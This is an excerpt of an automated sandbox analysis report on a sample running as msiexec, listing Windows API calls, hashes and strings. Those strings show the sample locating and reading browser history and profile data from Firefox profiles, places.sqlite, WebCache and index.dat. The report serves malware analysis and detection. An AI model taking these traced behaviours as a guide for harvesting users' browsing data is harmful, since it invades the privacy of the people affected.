                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 2941347001-0
                                                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcscat$wcscpywcslen
                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                              • API String ID: 2489821370-1174173950
                                                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040A824
                                                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • wcscpy.MSVCRT ref: 0040A854
                                                                                              • wcscat.MSVCRT ref: 0040A86A
                                                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 669240632-0
                                                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                              • String ID: "%s"
                                                                                              • API String ID: 1343145685-3297466227
                                                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                              • API String ID: 1714573020-3385500049
                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                              • memset.MSVCRT ref: 00408828
                                                                                              • memset.MSVCRT ref: 00408840
                                                                                              • memset.MSVCRT ref: 00408858
                                                                                              • memset.MSVCRT ref: 00408870
                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 2911713577-0
                                                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                              APIs
                                                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp
                                                                                              • String ID: @ $SQLite format 3
                                                                                              • API String ID: 1475443563-3708268960
                                                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmpqsort
                                                                                              • String ID: /nosort$/sort
                                                                                              • API String ID: 1579243037-1578091866
                                                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040E60F
                                                                                              • memset.MSVCRT ref: 0040E629
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Strings
                                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                              • API String ID: 3354267031-2114579845
                                                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                              APIs
                                                                                              Strings
                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                              • API String ID: 2221118986-1725073988
                                                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                              APIs
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$memcmp
                                                                                              • String ID: $$8
                                                                                              • API String ID: 2808797137-435121686
                                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                              APIs
                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                              • String ID:
                                                                                              • API String ID: 1979745280-0
                                                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                              APIs
                                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                              • free.MSVCRT ref: 00418803
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 1355100292-0
                                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                              APIs
                                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProcVersionmemsetwcscpy
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                              • API String ID: 4182280571-2036018995
                                                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                              APIs
                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                              • memset.MSVCRT ref: 00403A55
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                              • String ID: history.dat$places.sqlite
                                                                                              • API String ID: 2641622041-467022611
                                                                                              • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                              • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                              APIs
                                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$File$PointerRead
                                                                                              • String ID:
                                                                                              • API String ID: 839530781-0
                                                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID: *.*$index.dat
                                                                                              • API String ID: 1974802433-2863569691
                                                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 1156039329-0
                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 3397143404-0
                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                              APIs
